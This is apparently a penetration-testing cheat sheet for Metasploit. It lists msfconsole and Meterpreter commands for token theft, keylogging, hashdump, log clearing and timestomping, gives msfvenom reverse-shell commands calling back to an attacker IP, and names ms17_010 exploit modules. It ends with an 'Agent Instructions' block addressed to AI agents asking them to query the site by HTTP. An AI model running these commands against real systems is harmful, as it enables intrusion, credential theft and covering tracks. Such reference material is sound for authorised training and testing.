# Metasploit Framework ## **Introduction** > The Metasploit Framework is a Ruby-based penetration testing platform that writing, testing, and executing exploit code.\ > Metasploit contains a suite of tools to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. *** ## **MSFconsole Commands** | Command | Description | | ------------- | -------------------------------------------------------------------- | | show exploits | Show all exploits within the Framework. | | show payloads | Show all payloads within the Framework. | | setg | Set a specific value globally (for example, LHOST or RHOST). | | show options | Show the options available for a module or exploit. | | show targets | Show the platforms supported by the exploit. | | set target | Specify a specific target index if you know the OS and service pack. | | set payload | Specify the payload to use. | | show advanced | Show advanced options. | | sessions -l | List available sessions (used when handling multiple shells). | | sessions -i | Interact with a session | | sessions -K | Kill all live sessions. | | sessions -c | Execute a command on all live Meterpreter sessions. | | sessions -u | Upgrade a normal Win32 shell to a Meterpreter console. | *** ## **Meterpreter Commands** | Command | Description | | ------------------------------------------ | --------------------------------------------------------------------------------------------- | | migrate \ | Migrate to the specific process ID (PID is the target process ID gained from the ps command). | | list\_tokens -u | List available tokens on the target by user. | | list\_tokens -g | List available tokens on the target by group. | | impersonate\_token \ | Impersonate a token available on the target. | | steal\_token \ | Steal the tokens available for a given process and impersonate that token. | | drop\_token | Stop impersonating the current token. | | getsystem | Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors. | | shell | Drop into an interactive shell with all available tokens. | | execute -f \ -i | Execute cmd.exe and interact with it. | | execute -f \ -i -t | Execute cmd.exe with all available tokens. | | execute -f \ -i -H -t | Execute cmd.exe with all available tokens and make it a hidden process. | | rev2self | Revert back to the original user you used to compromise the target. | | reg | Interact, create, delete, query, set, and much more in the target’s registry. | | setdesktop | Switch to a different screen based on who is logged in. | | screenshot | Take a screenshot of the target’s screen. | | upload | Upload a file to the target. | | download | Download a file from the target. | | keyscan\_start | Start sniffing keystrokes on the remote target. | | keyscan\_dump | Dump the remote keys captured on the target. | | keyscan\_stop | Stop sniffing keystrokes on the remote target. | | getprivs | Get as many privileges as possible on the target. | | uictl enable \ | Take control of the keyboard and/or mouse. | | background | Run your current Meterpreter shell in the background. | | hashdump | Dump all hashes on the target. use sniffer Load the sniffer module. | | sniffer\_interfaces | List the available interfaces on the target. | | sniffer\_dump pcapname | Start sniffing on the remote target. | | sniffer\_start packet-buffer | Start sniffing with a specific range for a packet buffer. | | sniffer\_stats | Grab statistical information from the interface you are sniffing. | | sniffer\_stop | Stop the sniffer. | | add\_user -h | Add a user on the remote target. | | add\_group\_user <"Domain Admins"> -h | Add a username to the Domain Administrators group on the remote target. | | clearev | Clear the event log on the target machine. | | timestomp | Change file attributes, such as creation date (antiforensics measure). | | reboot | Reboot the target machine. | *** ## **Common Meterpreter Payloads for Windows** | Payload | Description | | --------------------------------- | ---------------------------------------------------------------------- | | generic/custom | Generic listener, multi-use | | generic/shell\_bind\_tcp | Generic listener, multi-use, normal shell, TCP connection binding | | generic/shell\_reverse\_tcp | Generic listener, multi-use, normal shell, reverse TCP connection | | windows/x64/exec | Executes an arbitrary command (Windows x64) | | windows/x64/loadlibrary | Loads an arbitrary x64 library path | | windows/x64/messagebox | Spawns a dialog via MessageBox using a customizable title, text & icon | | windows/x64/shell\_reverse\_tcp | Normal shell, single payload, reverse TCP connection | | windows/x64/shell/reverse\_tcp | Normal shell, stager + stage, reverse TCP connection | | windows/x64/shell/bind\_ipv6\_tcp | Normal shell, stager + stage, IPv6 Bind TCP stager | | windows/x64/meterpreter/$ | Meterpreter payload + varieties above | | windows/x64/powershell/$ | Interactive PowerShell sessions + varieties above | | windows/x64/vncinject/$ | VNC Server (Reflective Injection) + varieties above | *** ## **Importing External Exploits into MSFConsole** > The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework`\ > Alternatively, you can use the folder `/home/username/.msf4`\ > To import a module, you just need to copy it in one of the previous folders and use the `reload_all` command.\ > Alternatively, you can load a module at runtime by using `loadpath /usr/share/metasploit-framework/modules/`
*** ## **Meterpreter Pivoting** | Command | Description | | --------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------- | | portfwd add -R -l 8443 -p 1234 -L 10.10.14.15 | Set up a local port forwarding rule to forward all traffic destined to port 1234 on 10.10.14.15 to port 8443 on our attack host | | run autoroute -s 172.16.9.0/23 | set up a route to the 172.16.9.0/23 subnet | *** ## **Msfconsole & Msfvenom** | Commands | Description | | ------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------- | | use exploit/windows/smb/psexec | Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing smb & psexec | | shell | Command used in a meterpreter shell session to drop into a system shell | | msfvenom -p linux/x64/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf | MSFvenom command used to generate a linux-based reverse shell stageless payload | | msfvenom -p windows/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe | MSFvenom command used to generate a Windows-based reverse shell stageless payload | | msfvenom -p osx/x86/shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho | MSFvenom command used to generate a MacOS-based reverse shell payload | | msfvenom -p windows/meterpreter/reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp | MSFvenom command used to generate a ASP web reverse shell payload | | msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp | MSFvenom command used to generate a JSP web reverse shell payload | | msfvenom -p java/jsp\_shell\_reverse\_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war | MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload | | use auxiliary/scanner/smb/smb\_ms17\_010 | Metasploit exploit module used to check if a host is vulnerable to ms17\_010 | | use exploit/windows/smb/ms17\_010\_psexec | Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17\_010 | | use exploit/linux/http/rconfig\_vendors\_auth\_file\_upload\_rce | Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting rConfig 3.9.6 | *** ## **Utilities - Exploit Suggester & HashDump** * `local_exploit_suggester`: useful module for privesc * `hashdump` or `comando lsa_dump_secrets` or `lsa_dump_sam`: commands to dump all passwords \\ * Disclaimer: before using `hashdump` you need to ensure to have `root` or `nt authority system` privileges * To do that, use `ps` to check the permissions of the current process you are on, then use `migrate PID` on a root process, if you aren't root already --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/utilities-scripts-and-payloads/metasploit-framework.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.